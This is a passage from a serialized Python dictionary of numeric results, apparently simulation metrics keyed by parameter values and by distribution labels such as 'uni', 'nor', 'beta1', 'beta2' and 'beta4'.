0.863325702964267, 'nor': 1.0163561854641152, 'beta1': 0.8609990835029007, 'beta2': 1.4501812273816659, 'beta4': 0.7933909895157425}, 100: {'uni': 0.8535173498455411, 'nor': 0.9332321122550727, 'beta1': 0.855451185502481, 'beta2': 1.2836429881798883, 'beta4': 0.8283385948050672}, 75: {'uni': 0.8719646248874783, 'nor': 0.9339021717557474, 'beta1': 0.8834615749377533, 'beta2': 1.157371893819168, 'beta4': 0.8151331566491923}, 50: {'uni': 0.8588721072497052, 'nor': 0.9324710043913952, 'beta1': 0.8592057109555745, 'beta2': 1.005974174058964, 'beta4': 0.8441503729380052}, 30: {'uni': 0.8268972332475851, 'nor': 0.8939432944293645, 'beta1': 0.8637300328894056, 'beta2': 0.9696041216651038, 'beta4': 0.8349904563989077}, 20: {'uni': 0.8575101264137438, 'nor': 0.8505944620056278, 'beta1': 0.8252029433248387, 'beta2': 0.9138477219306325, 'beta4': 0.859578392201494}, 10: {'uni': 0.8358303873495666, 'nor': 0.8475060468582208, 'beta1': 0.8198935626927145, 'beta2': 0.8863798415821968, 'beta4': 0.8028217733408507}}, 750: {1000: {'uni': 0.8893529119601304, 'nor': 1.8735326010619875, 'beta1': 0.8535189782879702, 'beta2': 5.094330840454726, 'beta4': 0.5252869847576926}, 750: {'uni': 0.8662548201881118, 'nor': 1.5939108097202517, 'beta1': 0.8620863564259129, 'beta2': 3.9224913698305763, 'beta4': 0.5565068303406758}, 500: {'uni': 0.8687024244817314, 'nor': 1.3429858216869892, 'beta1': 0.8659273649776043, 'beta2': 2.8714917333330945, 'beta4': 0.6115318046265227}, 400: {'uni': 0.8477929303428912, 'nor': 1.303342679028703, 'beta1': 0.8809644810541455, 'beta2': 2.525131323735293, 'beta4': 0.6209718469957444}, 300: {'uni': 0.8455781800923797, 'nor': 1.1790701643940078, 'beta1': 0.8989754737431781, 'beta2': 2.0532709282654986, 'beta4': 0.7031938135827249}, 200: {'uni': 0.8523231827202161, 'nor': 1.0542529777285443, 'beta1': 0.8485149018797521, 'beta2': 1.6805292794311386, 'beta4': 0.7350427322547652}, 150: {'uni': 0.8396399434545224, 'nor': 1.0383213011327654, 'beta1': 0.8440622218870381, 'beta2': 1.4760254972629505, 'beta4': 0.7523241499310742}, 100: {'uni': 0.8566810026475448, 'nor': 1.0171647257308214, 'beta1': 0.8613367134797993, 'beta2': 1.3133239582389826, 'beta4': 0.7943525941981162}, 75: {'uni': 0.8660172203154917, 'nor': 0.9591045119200551, 'beta1': 0.8369295019442069, 'beta2': 1.1456508181998266, 'beta4': 0.8038265430699089}, 50: {'uni': 0.8916502682562102, 'nor': 0.9134648222438218, 'beta1': 0.8650674166134595, 'beta2': 1.049261212642131, 'beta4': 0.8429049932670651}, 30: {'uni': 0.8473840494179985, 'nor': 0.8593935913424329, 'beta1': 0.8549015071344843, 'beta2': 0.9488767154018491, 'beta4': 0.8370179764634424}, 20: {'uni': 0.8404817022893748, 'nor': 0.877865137025845, 'beta1': 0.8739655207876006, 'beta2': 0.928251728118239, 'beta4': 0.8381578990306405}, 10: {'uni': 0.848709588465607, 'nor': 0.8389582119738962, 'beta1': 0.8048592485731447, 'beta2': 0.8735632432997815, 'beta4': 0.8077397160130388}}, 500: {1000: {'uni': 0.8869990124500643, 'nor': 2.3926471716005158, 'beta1': 0.8656755725118289, 'beta2': 6.218693125937045, 'beta4': 0.47295872282949647}, 750: {'uni': 0.8711004704227291, 'nor': 1.9852109566671436, 'beta1': 0.8695174006440114, 'beta2': 4.849215935260051, 'beta4': 0.5053262520867102}, 500: {'uni': 0.8798487334123686, 'nor': 1.6132673631091394, 'beta1': 0.8630878624950258, 'beta2': 3.5751240393739327, 'beta4': 0.5511306421251556}, 400: {'uni': 0.903491887056683, 'nor': 1.4973046687736005, 'beta1': 0.8929322973576271, 'beta2': 3.0325455273622204, 'beta4': 0.6067709882656296}, 300: {'uni': 0.8670349102220135, 'nor': 1.290326276042757, 'beta1': 0.839686493831913, 'beta2': 2.435890895296174, 'beta4': 0.6075123141293552}, 200: {'uni': 0.8525634185824962, 'nor': 1.2167168133729125, 'beta1': 0.8751305172873307, 'beta2': 1.8939241535011913, 'beta4': 0.6858269415712721}, 150: {'uni': 0.82194800780123, 'nor': 1.0736570375346075, 'beta1': 0.8744521367451882, 'beta2': 1.666617032750535, 'beta4': 0.7183015194836465}, 100: {'uni': 0.8480075940431231, 'nor': 1.005613242317469, 'beta1': 0.9038607200973079, 'beta2': 1.4360275830921037, 'beta4': 0.765583568088014}, 75: {'uni': 0.8379740876341786, 'nor': 1.0190740775977551, 'beta1': 0.8762896090907831, 'beta2': 1.1997858513807305, 'beta4': 0.7991634940817146}, 50: {'uni': 0.8474335678968142, 'nor': 0.966687963122637, 'beta1': 0.8814985864516113, 'beta2': 1.1013494852594226, 'beta4': 0.814899411714437}, 30: {'uni': 0.8727086391467926, 'nor': 0.8921547081202534, 'beta1': 0.8539393755115126, 'beta2': 0.9699137113255722, 'beta4': 0.8265640852509611}, 20: {'uni': 0.8509580839243661, 'nor': 0.8976419303592276, 'beta1': 0.8377850051812428, 'beta2': 0.9490003133987858, 'beta4': 0.822873280879306}, 10: {'uni': 0.8070223792543272, 'nor': 0.8222121101020897, 'beta1': 0.8169261630244183, 'beta2': 0.8687590176135066, 'beta4': 0.8358281226159047}}, 400: {1000: {'uni': 0.8322925059461799, 'nor': 2.772959248898575, 'beta1': 0.8893671382511937, 'beta2': 6.069963280541391, 'beta4': 0.4477691999805573}, 750: {'uni': 0.8613686583710596, 'nor': 2.2314767356879326, 'beta1': 0.8568956660509862, 'beta2': 4.854992785999708, 'beta4': 0.4832858323318025}, 500: {'uni': 0.8567699511619379, 'nor': 1.8200600461414693, 'beta1': 0.9080785163321283, 'beta2': 3.4157894226102203, 'beta4': 0.551367596609852}, 400: {'uni': 0.8369044265082584, 'nor': 1.5845080295693856, 'beta1': 0.8500625111572069, 'beta2': 2.9594155017882446, 'beta4': 0.5474817232894605}, 300: {'uni': 0.8687488891518946, 'nor': 1.4620428679624027, 'beta1': 0.8877443382363509, 'beta2': 2.481100386426921, 'beta4': 0.5937679151105709}, 200: {'uni': 0.8268590674018326, 'nor': 1.2437500818930782, 'beta1': 0.8799053584315863, 'beta2': 1.9723014293020296, 'beta4': 0.6786183666437543}, 150: {'uni': 0.8589374510858506, 'nor': 1.1816870309605243, 'beta1': 0.8718362510385768, 'beta2': 1.6860574439544969, 'beta4': 0.7224050217211732}, 100: {'uni': 0.8637240017119076, 'nor': 1.0352677456743422, 'beta1': 0.8417017245035276, 'beta2': 1.409613185720384, 'beta4': 0.7405058894550209}, 75: {'uni': 0.8637532375150383, 'nor': 0.9779373487935997, 'beta1': 0.8781013460358983, 'beta2': 1.237799529212922, 'beta4': 0.763051811457541}, 50: {'uni': 0.8469820141871477, 'nor': 0.9527738404825348, 'beta1': 0.854958580126025, 'beta2': 1.1302429451594769, 'beta4': 0.8011092866946141}, 30: {'uni': 0.8736551317015678, 'nor': 0.8951809427802495, 'beta1': 0.8825847779488676, 'beta2': 0.976513604820869, 'beta4': 0.8236922508203844}, 20: {'uni': 0.8445914174745024, 'nor': 0.8978427140297524, 'beta1': 0.8285384005464761, 'beta2': 0.9441752062117178, 'beta4': 0.8079416993063016}, 10: {'uni': 0.8059582553072695, 'nor': 0.8422271125818357, 'beta1': 0.822948579547678, 'beta2': 0.8530417818519627, 'beta4': 0.7908692241190146}}, 300: {1000: {'uni': 0.85015130833887, 'nor': 3.434760468098905, 'beta1': 0.8571894410585443, 'beta2': 6.921244428990534, 'beta4': 0.4092729787000081}, 750: {'uni': 0.862825596472843, 'nor': 2.7875235825000546, 'beta1': 0.8942786992828993, 'beta2': 5.640485944820529, 'beta4': 0.4523328926527227}, 500: {'uni': 0.8612530107937411, 'nor': 2.087138712332073, 'beta1': 0.8499689110732196, 'beta2': 3.9314480214815304, 'beta4': 0.48599991641199985}, 400: {'uni': 0.8719345715637321, 'nor': 1.948459695654461, 'beta1': 0.8535901226550221, 'beta2': 3.376116676834797, 'beta4': 0.5307479361442003}, 300: {'uni': 0.8670545417493539, 'nor': 1.5564108606749094, 'beta1': 0.8498653001731661, 'beta2': 2.8470550015231573, 'beta4': 0.5693301542257994}, 200: {'uni': 0.8668097879968475, 'nor': 1.3376277704327313, 'beta1': 0.8315542163435912, 'beta2': 2.2063579986840036, 'beta4': 0.6039260854671632}, 150: {'uni': 0.8271864622954613, 'nor': 1.2200355388246191, 'beta1': 0.883742467942023, 'beta2': 1.869013842158086, 'beta4': 0.643155393507137}, 100: {'uni': 0.8638972306464799, 'nor': 1.1342641709471044, 'beta1': 0.8598375912189091, 'beta2': 1.5120532688493489, 'beta4': 0.7403717834928402}, 75: {'uni': 0.8583473461451383, 'nor': 1.0800462905879058, 'beta1': 0.8923649808568489, 'beta2': 1.3317255953293965, 'beta4': 0.7345166246898442}, 50: {'uni': 0.8746732518178894, 'nor': 0.9675091473720824, 'beta1': 0.869571585857279, 'beta2': 1.1552038645884999, 'beta4': 0.758415241068141}, 30: {'uni': 0.8799939789005814, 'nor': 0.9517419294376883, 'beta1': 0.8743679176044513, 'beta2': 1.033882047029358, 'beta4': 0.820234969285508}, 20: {'uni': 0.8351927773424345, 'nor': 0.9115728880522416, 'beta1': 0.8661553510614836, 'beta2': 0.9463253532297905, 'beta4': 0.8267082483693564}, 10: {'uni': 0.8406316325477106, 'nor': 0.8314613208194097, 'beta1': 0.8415689332783691, 'beta2': 0.8676067009565547, 'beta4': 0.7923546623661532}}, 200: {1000: {'uni': 0.8857663238193778, 'nor': 4.680179487924737, 'beta1': 0.8596985445949961, 'beta2': 8.640727300137126, 'beta4': 0.3894629855731228}, 750: {'uni': 0.8822609513200822, 'nor': 3.6240629787778325, 'beta1': 0.8509327610699031, 'beta2': 7.06440107867899, 'beta4': 0.4136128719602394}, 500: {'uni': 0.8951511408281749, 'nor': 2.706478161877119, 'beta1': 0.8750179255888083, 'beta2': 4.923212625453092, 'beta4': 0.4438676650195852}, 400: {'uni': 0.8621099039944393, 'nor': 2.3112226100492634, 'beta1': 0.8637393226967995, 'beta2': 4.142311379028304, 'beta4': 0.4989802884758265}, 300: {'uni': 0.8815086783155325, 'nor': 1.973012357083618, 'beta1': 0.8855622176886478, 'beta2': 3.245637925919703, 'beta4': 0.5014064302476238}, 200: {'uni': 0.8328108622368053, 'nor': 1.5986517188378813, 'beta1': 0.8670516338633621, 'beta2': 2.441582595720951, 'beta4': 0.5675354711561659}, 150: {'uni': 0.8509108075288516, 'nor': 1.437846992896105, 'beta1': 0.836851186717404, 'beta2': 1.9740942359159892, 'beta4': 0.613923547729645}, 100: {'uni': 0.8768933007965606, 'nor': 1.2219082590934622, 'beta1': 0.8710445433259488, 'beta2': 1.6652834592979155, 'beta4': 0.6807453974973048}, 75: {'uni': 0.8696669504918266, 'nor': 1.124306793828307, 'beta1': 0.8708924475587642, 'beta2': 1.4585340544518133, 'beta4': 0.6921789139786938}, 50: {'uni': 0.890137756708636, 'nor': 1.0380991897651526, 'beta1': 0.9038916870128674, 'beta2': 1.2617159118800856, 'beta4': 0.737301894421063}, 30: {'uni': 0.8577280992654713, 'nor': 0.9922674847278834, 'beta1': 0.8495021132831815, 'beta2': 1.1148815215500807, 'beta4': 0.7716495960817314}, 20: {'uni': 0.8719153771105802, 'nor': 0.9596683679575053, 'beta1': 0.8591127846243085, 'beta2': 0.9966712227887798, 'beta4': 0.8093952871372214}, 10: {'uni': 0.8302695587113106, 'nor': 0.8708970655099307, 'beta1': 0.823064138178113, 'beta2': 0.8889092964712426, 'beta4': 0.7977767176653532}}, 150: {1000: {'uni': 0.8986138998052507, 'nor': 5.7834675088135725, 'beta1': 0.8490270056828785, 'beta2': 10.407206757701623, 'beta4': 0.3788903299147765}, 750: {'uni': 0.8647457935668315, 'nor': 4.597985491272376, 'beta1': 0.8826314946034581, 'beta2': 7.917017378008792, 'beta4': 0.3939613164237079}, 500: {'uni': 0.8814291871824029, 'nor': 3.2742679017557763, 'beta1': 0.8645904562415648, 'beta2': 5.474819990031853, 'beta4': 0.4201942139903767}, 400: {'uni': 0.8719096515847061, 'nor': 2.8229044013952347, 'beta1': 0.8701785960891302, 'beta2': 4.581611606290644, 'beta4': 0.4331012710758666}, 300: {'uni': 0.8854658111693259, 'nor': 2.34542108556634, 'beta1': 0.8409188898825175, 'beta2': 3.5960889166936094, 'beta4': 0.4756845407835292}, 200: {'uni': 0.8701625486580659, 'nor': 1.8358292727217536, 'beta1': 0.8532097190695673, 'beta2': 2.72141338340365, 'beta4': 0.5228322599770573}, 150: {'uni': 0.8883732054354728, 'nor': 1.6784341004883028, 'beta1': 0.8480800478874988, 'beta2': 2.3548864538236587, 'beta4': 0.5478575722636306}, 100: {'uni': 0.8848899944215347, 'nor': 1.39003511176849, 'beta1': 0.8928556014396124, 'beta2': 1.7581183428124922, 'beta4': 0.6319233921298026}, 75: {'uni': 0.8476576587132466, 'nor': 1.2109186887878762, 'beta1': 0.8549274883770003, 'beta2': 1.5588624857940563, 'beta4': 0.6711749929357153}, 50: {'uni': 0.878992168637968, 'nor': 1.0893345758288648, 'beta1': 0.8571678620038059, 'beta2': 1.2936364210958133, 'beta4': 0.6911762280795586}, 30: {'uni': 0.8386807997491547, 'nor': 0.982291187821282, 'beta1': 0.8808367008354709, 'beta2': 1.0816297459507884, 'beta4': 0.7557102904498407}, 20: {'uni': 0.8307168833220502, 'nor': 0.9767678583343402, 'beta1': 0.8564594109233339, 'beta2': 0.989911410784959, 'beta4': 0.748952291872636}, 10: {'uni': 0.8194083425516434, 'nor': 0.8775832793387287, 'beta1': 0.8471358818316647, 'beta2': 0.8995129578120127, 'beta4': 0.7862318620719233}}, 100: {1000: {'uni': 0.8946637816542238, 'nor': 8.603780168858798, 'beta1': 0.8819450133887767, 'beta2': 12.286473618618768, 'beta4': 0.3681993165409592}, 750: {'uni': 0.9047095939989102, 'nor': 6.544331357001899, 'beta1': 0.8768385993384246, 'beta2': 9.510849254140902, 'beta4': 0.3748657037149706}, 500: {'uni': 0.8828573534389809, 'nor': 4.589167917409369, 'beta1': 0.8687021342851984, 'beta2': 6.4569490799550255, 'beta4': 0.4012132277414978}, 400: {'uni': 0.8816824734545268, 'nor': 3.8702556930171457, 'beta1': 0.868410778897242, 'beta2': 5.358536995714846, 'beta4': 0.39772599926896646}, 300: {'uni': 0.8487402016109327, 'nor': 3.13370246160681, 'beta1': 0.8839192006334508, 'beta2': 4.377387315114399, 'beta4': 0.43260286490656286}, 200: {'uni': 0.8550948483316095, 'nor': 2.2941222796515564, 'beta1': 0.8840654113992507, 'beta2': 3.1793274396848537, 'beta4': 0.4693380740694391}, 150: {'uni': 0.8726854391556464, 'nor': 1.9987190523931557, 'beta1': 0.8640065941351514, 'beta2': 2.4550201259308606, 'beta4': 0.5029338662023729}, 100: {'uni': 0.8744011176190648, 'nor': 1.599629546114851, 'beta1': 0.8758350528124487, 'beta2': 1.8341702678156442, 'beta4': 0.5535398055771565}, 75: {'uni': 0.8816360483295717, 'nor': 1.396209177505365, 'beta1': 0.8588496604966374, 'beta2': 1.7587314717424098, 'beta4': 0.6000984093869451}, 50: {'uni': 0.8444691076907881, 'nor': 1.2083130325494273, 'beta1': 0.8577643593273495, 'beta2': 1.4376280924624785, 'beta4': 0.6608219126680412}, 30: {'uni': 0.8186744117785408, 'nor': 1.070965603891437, 'beta1': 0.8483324727506986, 'beta2': 1.1580907306458454, 'beta4': 0.7234734928182613}, 20: {'uni': 0.8400701531478934, 'nor': 1.000113988644385, 'beta1': 0.8321822290696924, 'beta2': 1.0710298849251567, 'beta4': 0.7339870282448464}, 10: {'uni': 0.8382328001002571, 'nor': 0.9092521075722466, 'beta1': 0.8359072328233461, 'beta2': 0.9120018345512748, 'beta4': 0.7663868495863666}}, 75: {1000: {'uni': 0.9392011817188017, 'nor': 10.904728772367289, 'beta1': 0.866624607543039, 'beta2': 13.539885930108083, 'beta4': 0.3534109865942192}, 750: {'uni': 0.9355897301990589, 'nor': 8.230208100553527, 'beta1': 0.8573793409512389, 'beta2': 10.554777001721034, 'beta4': 0.3707815481206261}, 500: {'uni': 0.902737130958842, 'nor': 5.9005448659039414, 'beta1': 0.9039620810225308, 'beta2': 7.009224078205305, 'beta4': 0.37752549840973754}, 400: {'uni': 0.8820840867138475, 'nor': 4.906683628702614, 'beta1': 0.8471201075727584, 'beta2': 5.811385171318147, 'beta4': 0.37395562054497417}, 300: {'uni': 0.8905762412970645, 'nor': 3.8692194969852842, 'beta1': 0.9120410272155509, 'beta2': 4.664194484656855, 'beta4': 0.4126825810690872}, 200: {'uni': 0.8389878062923508, 'nor': 2.8755206530986688, 'beta1': 0.8502879253313526, 'beta2': 3.3092550616564202, 'beta4': 0.42921847952639935}, 150: {'uni': 0.8439913453823732, 'nor': 2.2602699891688856, 'beta1': 0.8817858849869306, 'beta2': 2.6797847545171676, 'beta4': 0.47138132435008684}, 100: {'uni': 0.8589328530157215, 'nor': 1.8035701933261568, 'beta1': 0.8723921800108287, 'beta2': 1.9841585248871425, 'beta4': 0.5132672551619654}, 75: {'uni': 0.8494008654992535, 'nor': 1.6071498176774344, 'beta1': 0.8921558615811434, 'beta2': 1.7948054307860677, 'beta4': 0.5600945143875852}, 50: {'uni': 0.8459905263294217, 'nor': 1.3456446878132973, 'beta1': 0.8360437432777298, 'beta2': 1.4098100528261963, 'beta4': 0.5995871991066353}, 30: {'uni': 0.863255907688344, 'nor': 1.163832926785131, 'beta1': 0.8610017576182266, 'beta2': 1.2221297578160732, 'beta4': 0.6852793799758119}, 20: {'uni': 0.8208301547311144, 'nor': 1.0466688062181275, 'beta1': 0.8659319938555088, 'beta2': 1.0233244108524449, 'beta4': 0.7240872799802124}, 10: {'uni': 0.8032328211939312, 'nor': 0.9417402156036838, 'beta1': 0.8526278553950033, 'beta2': 0.9217056736337736, 'beta4': 0.7718520630849283}}, 50: {1000: {'uni': 1.0415495975920712, 'nor': 16.265730359177034, 'beta1': 0.8877957838662055, 'beta2': 16.885442852467367, 'beta4': 0.3448739500232382}, 750: {'uni': 1.0098033949308896, 'nor': 12.258570778017333, 'beta1': 0.8706995791907859, 'beta2': 12.395166093820881, 'beta4': 0.35315381524036327}, 500: {'uni': 0.9415139858342592, 'nor': 8.481807472429985, 'beta1': 0.8972503865903044, 'beta2': 8.392611665283725, 'beta4': 0.36998606207623813}, 400: {'uni': 0.9115614150434282, 'nor': 6.710526205260556, 'beta1': 0.8363890434236055, 'beta2': 6.893481197785906, 'beta4': 0.35909227964437845}, 300: {'uni': 0.8787877860539303, 'nor': 5.174832246974513, 'beta1': 0.8566295227226275, 'beta2': 5.494166649585702, 'beta4': 0.3906665116470583}, 200: {'uni': 0.868109213219911, 'nor': 3.8785570981039923, 'beta1': 0.8486507394057397, 'beta2': 3.967316649529905, 'beta4': 0.4099010863230901}, 150: {'uni': 0.8521655040528395, 'nor': 3.089208594179127, 'beta1': 0.86485525155687, 'beta2': 3.1562227864035775, 'beta4': 0.4259916065124458}, 100: {'uni': 0.8538795335041026, 'nor': 2.345951444856802, 'beta1': 0.8576683025117604, 'beta2': 2.34371617917428, 'beta4': 0.47209240963168714}, 75: {'uni': 0.8518076855463557, 'nor': 2.004537103880557, 'beta1': 0.8924709495111173, 'beta2': 1.943645059238237, 'beta4': 0.5024138107270238}, 50: {'uni': 0.8529988890643148, 'nor': 1.637600402682281, 'beta1': 0.887282270801599, 'beta2': 1.5942525719928833, 'beta4': 0.5461737896321196}, 30: {'uni': 0.8317247039979097, 'nor': 1.2728847122349543, 'beta1': 0.8763974125117077, 'beta2': 1.2510718185241683, 'beta4': 0.6168812853181134}, 20: {'uni': 0.8288102680813932, 'nor': 1.127591734617398, 'beta1': 0.8484767896870734, 'beta2': 1.0683362295171508, 'beta4': 0.6634916799393047}, 10: {'uni': 0.8176133987807528, 'nor': 0.962361595088012, 'beta1': 0.8463373485431211, 'beta2': 0.9792459537116653, 'beta4': 0.7132996896249393}}, 30: {1000: {'uni': 1.2696860283761329, 'nor': 27.028546181049798, 'beta1': 0.8886841713466621, 'beta2': 21.836331871174327, 'beta4': 0.34885048965467425}, 750: {'uni': 1.1759720018152577, 'nor': 20.606898542988638, 'beta1': 0.8823359568565259, 'beta2': 16.492206692516675, 'beta4': 0.3456789491663497}, 500: {'uni': 1.0607922271898333, 'nor': 13.499694108821545, 'beta1': 0.8704093259926938, 'beta2': 10.840977904557175, 'beta4': 0.3586589082724464}, 400: {'uni': 1.034149292980726, 'nor': 10.918561084901162, 'beta1': 0.8744363285476298, 'beta2': 8.989655953402785, 'beta4': 0.35894729709119183}, 300: {'uni': 0.9693906483358444, 'nor': 8.511512725546728, 'beta1': 0.8913582403756317, 'beta2': 6.734747049938925, 'beta4': 0.3571048621894059}, 200: {'uni': 0.9295062768532519, 'nor': 5.726145369760396, 'beta1': 0.8464608450876929, 'beta2': 4.740491290627747, 'beta4': 0.3753071091113352}, 150: {'uni': 0.8911914980160859, 'nor': 4.786527437358327, 'beta1': 0.9029710546460754, 'beta2': 3.627949786933054, 'beta4': 0.3868813723011823}, 100: {'uni': 0.8741205713557936, 'nor': 3.3912944344384437, 'beta1': 0.8420955501315833, 'beta2': 2.740025646984923, 'beta4': 0.42282517623248606}, 75: {'uni': 0.8417413679465983, 'nor': 2.770535795664202, 'beta1': 0.8689267525581056, 'beta2': 2.3351824154600016, 'beta4': 0.4355723263901833}, 50: {'uni': 0.8293019485037857, 'nor': 2.1331783667990547, 'beta1': 0.8636890393573666, 'beta2': 1.795449942087839, 'beta4': 0.47663699780502283}, 30: {'uni': 0.8398719438451165, 'nor': 1.5873110864904567, 'beta1': 0.8458052978100878, 'beta2': 1.3157854252669225, 'beta4': 0.542696670833237}, 20: {'uni': 0.8588110918111577, 'nor': 1.370992161006879, 'beta1': 0.8127388456820281, 'beta2': 1.2066500169529317, 'beta4': 0.6136617948645082}, 10: {'uni': 0.8082099171087873, 'nor': 1.122302969663073, 'beta1': 0.7984881402335584, 'beta2': 0.9808222408488511, 'beta4': 0.7086263964034699}}, 20: {1000: {'uni': 1.7845594214279576, 'nor': 40.15832565029172, 'beta1': 0.950259894237407, 'beta2': 25.861562337744196, 'beta4': 0.32973420092003286}, 750: {'uni': 1.5897522441647864, 'nor': 28.315155657619325, 'beta1': 0.913891705486057, 'beta2': 20.117293413810955, 'beta4': 0.34329017661554695}, 500: {'uni': 1.3030580424170426, 'nor': 20.253228491861286, 'beta1': 0.9220502576370694, 'beta2': 13.583692929451516, 'beta4': 0.35295824845181184}, 400: {'uni': 1.2511593986123553, 'nor': 16.721863866209368, 'beta1': 0.8890682031702455, 'beta2': 11.11481009070622, 'beta4': 0.3504685746126408}, 300: {'uni': 1.1556472143034846, 'nor': 12.530843145240851, 'beta1': 0.8995531892253813, 'beta2': 8.478893847650728, 'beta4': 0.34635706601890454}, 200: {'uni': 1.002551669149528, 'nor': 8.576294654093017, 'beta1': 0.8723105746829944, 'beta2': 5.853099794656523, 'beta4': 0.36846801010142255}, 150: {'uni': 0.9694379710633484, 'nor': 6.690519847813086, 'beta1': 0.8717961407072875, 'beta2': 4.597201584965225, 'beta4': 0.3659628260777635}, 100: {'uni': 0.8977854726841326, 'nor': 4.692828531090058, 'beta1': 0.8496010281273996, 'beta2': 3.1550068582035578, 'beta4': 0.38511701524257447}, 75: {'uni': 0.9118678625047828, 'nor': 3.7324572320229095, 'beta1': 0.8652199493328219, 'beta2': 2.529492997234143, 'beta4': 0.40778432043338764}, 50: {'uni': 0.8543398305647835, 'nor': 2.876515939258069, 'beta1': 0.83415119798805, 'beta2': 1.978057747859159, 'beta4': 0.4411959818288761}, 30: {'uni': 0.8433281461496579, 'nor': 1.9748223737762594, 'beta1': 0.8359570278817351, 'beta2': 1.463749824817638, 'beta4': 0.4833063970512745}, 20: {'uni': 0.8332039379907832, 'nor': 1.5857551546674844, 'beta1': 0.8245999245393716, 'beta2': 1.2217108424486114, 'beta4': 0.5416079971879648}, 10: {'uni': 0.767644168526127, 'nor': 1.186352156756191, 'beta1': 0.8038565208106804, 'beta2': 0.9942753593007874, 'beta4': 0.631678251643074}}, 10: {1000: {'uni': 3.753193315878337, 'nor': 80.54961219964801, 'beta1': 1.4544532440986977, 'beta2': 37.457752389369944, 'beta4': 0.33787557256732886}, 750: {'uni': 3.13190540427256, 'nor': 61.39195913384035, 'beta1': 1.2853163542779982, 'beta2': 28.219925280709226, 'beta4': 0.3438604922632593}, 500: {'uni': 2.361928334320761, 'nor': 39.264786613414124, 'beta1': 1.0987827263867904, 'beta2': 19.44333576209149, 'beta4': 0.34485169875041716}, 400: {'uni': 2.0476194993736376, 'nor': 32.94817315559009, 'beta1': 1.0488861998480152, 'beta2': 15.54348581454614, 'beta4': 0.33462832934226017}, 300: {'uni': 1.7346022453973275, 'nor': 24.123522158092758, 'beta1': 0.9961117172285985, 'beta2': 11.539236263935074, 'beta4': 0.3497737633950961}, 200: {'uni': 1.4525939834033061, 'nor': 16.34875245088017, 'beta1': 0.9253876022802889, 'beta2': 8.020657570999116, 'beta4': 0.34879974403231523}, 150: {'uni': 1.298454489895215, 'nor': 12.039103036503901, 'beta1': 0.8983179227349697, 'beta2': 6.1480857184206545, 'beta4': 0.3515031726202898}, 100: {'uni': 1.149106274875983, 'nor': 8.792370330870405, 'beta1': 0.8859050703287877, 'beta2': 4.127419446528227, 'beta4': 0.37328300271926307}, 75: {'uni': 1.0510563523184537, 'nor': 6.690824582353118, 'beta1': 0.8676483571212735, 'beta2': 3.261862421040156, 'beta4': 0.35955743890308756}, 50: {'uni': 0.944355604551499, 'nor': 4.8498605482734485, 'beta1': 0.856890203472039, 'beta2': 2.40472627933374, 'beta4': 0.3740413835304806}, 30: {'uni': 0.856343008929495, 'nor': 3.122509717131945, 'beta1': 0.7969111331070415, 'beta2': 1.6917780539337604, 'beta4': 0.420410921911824}, 20: {'uni': 0.8184308142900829, 'nor': 2.404727094095177, 'beta1': 0.8086310697032824, 'beta2': 1.4107687480292843, 'beta4': 0.44807980574077305}, 10: {'uni': 0.7832503930172614, 'nor': 1.5626869225976665, 'beta1': 0.7853435742092469, 'beta2': 1.0642285862729415, 'beta4': 0.5256048778718274}}}, 0.01: {1000: {1000: {'uni': 0.7219503597168808, 'nor': 1.3522899382499511, 'beta1': 0.7503888090005709, 'beta2': 4.359712279210015, 'beta4': 0.47805541074462554}, 750: {'uni': 0.7460653360509083, 'nor': 1.2215802732877805, 'beta1': 0.7579034372202724, 'beta2': 3.44439122365882, 'beta4': 0.5013760660613135}, 500: {'uni': 0.7457104709224507, 'nor': 1.0274833085776511, 'beta1': 0.7356416860323749, 'beta2': 2.379942654242188, 'beta4': 0.5628465543348214}, 400: {'uni': 0.7540793490028289, 'nor': 0.9939475957798122, 'beta1': 0.7677563353825323, 'beta2': 2.085462426476235, 'beta4': 0.5902860977216214}, 300: {'uni': 0.7416999961068458, 'nor': 0.9093968404709234, 'beta1': 0.7454049674434894, 'beta2': 1.707950964614366, 'beta4': 0.6001696878842937}, 200: {'uni': 0.7524857828756578, 'nor': 0.890322894897767, 'beta1': 0.7254202434608807, 'beta2': 1.3850934656667797, 'beta4': 0.6253567875211119}, 150: {'uni': 0.7464000130882479, 'nor': 0.82772600390256, 'beta1': 0.748717836598423, 'beta2': 1.2348711064861624, 'beta4': 0.6676094543272186}, 100: {'uni': 0.7406116313995137, 'nor': 0.7846559695042307, 'beta1': 0.7436305573461189, 'beta2': 1.058180498214777, 'beta4': 0.6960649268744108}, 75: {'uni': 0.7336661138941689, 'nor': 0.7752977113565671, 'beta1': 0.7119633999030476, 'beta2': 0.9638602094125377, 'beta4': 0.7106380565315166}, 50: {'uni': 0.7274345032232149, 'nor': 0.7769370576160674, 'beta1': 0.7283032566959488, 'beta2': 0.9082889542215573, 'beta4': 0.7042713454877574}, 30: {'uni': 0.71539271539834, 'nor': 0.7636883535575116, 'beta1': 0.7265786350524956, 'beta2': 0.8451376503815184, 'beta4': 0.7172879038073893}, 20: {'uni': 0.7278822712528917, 'nor': 0.7329383859926495, 'beta1': 0.7426269815726088, 'beta2': 0.7846227593442195, 'beta4': 0.7144990540387691}, 10: {'uni': 0.7131138660193919, 'nor': 0.7161480646534595, 'beta1': 0.6990538369629343, 'beta2': 0.7376189274957015, 'beta4': 0.7088112725925363}}, 750: {1000: {'uni': 0.7514448328173757, 'nor': 1.5690434935428623, 'beta1': 0.7238769915288217, 'beta2': 4.38682423614769, 'beta4': 0.4524323542299279}, 750: {'uni': 0.7455825696325514, 'nor': 1.3328601960899922, 'beta1': 0.7438570163136006, 'beta2': 3.355424284560506, 'beta4': 0.4758585436464304}, 500: {'uni': 0.7330809665950883, 'nor': 1.135828118704559, 'beta1': 0.7459578036681647, 'beta2': 2.338558656779778, 'beta4': 0.543469912113142}, 400: {'uni': 0.7393601770653746, 'nor': 1.052047627034842, 'beta1': 0.7600197916673754, 'beta2': 2.1262388399145316, 'beta4': 0.5680920375709674}, 300: {'uni': 0.733890553738948, 'nor': 0.9951567989849669, 'beta1': 0.7491899564747048, 'beta2': 1.7142789768265858, 'beta4': 0.5873317180036289}, 200: {'uni': 0.7173225588019696, 'nor': 0.9241399821663433, 'beta1': 0.7167646128108208, 'beta2': 1.398836761053942, 'beta4': 0.6156346475851152}, 150: {'uni': 0.7552102082425654, 'nor': 0.8640953826991624, 'beta1': 0.770371701027368, 'beta2': 1.2233959927790403, 'beta4': 0.6696303297293811}, 100: {'uni': 0.7586001636448041, 'nor': 0.8265445942127733, 'beta1': 0.7298586370318658, 'beta2': 1.0788951673020957, 'beta4': 0.6819565674039529}, 75: {'uni': 0.7339719193619441, 'nor': 0.7970213915919653, 'beta1': 0.7452981007326952, 'beta2': 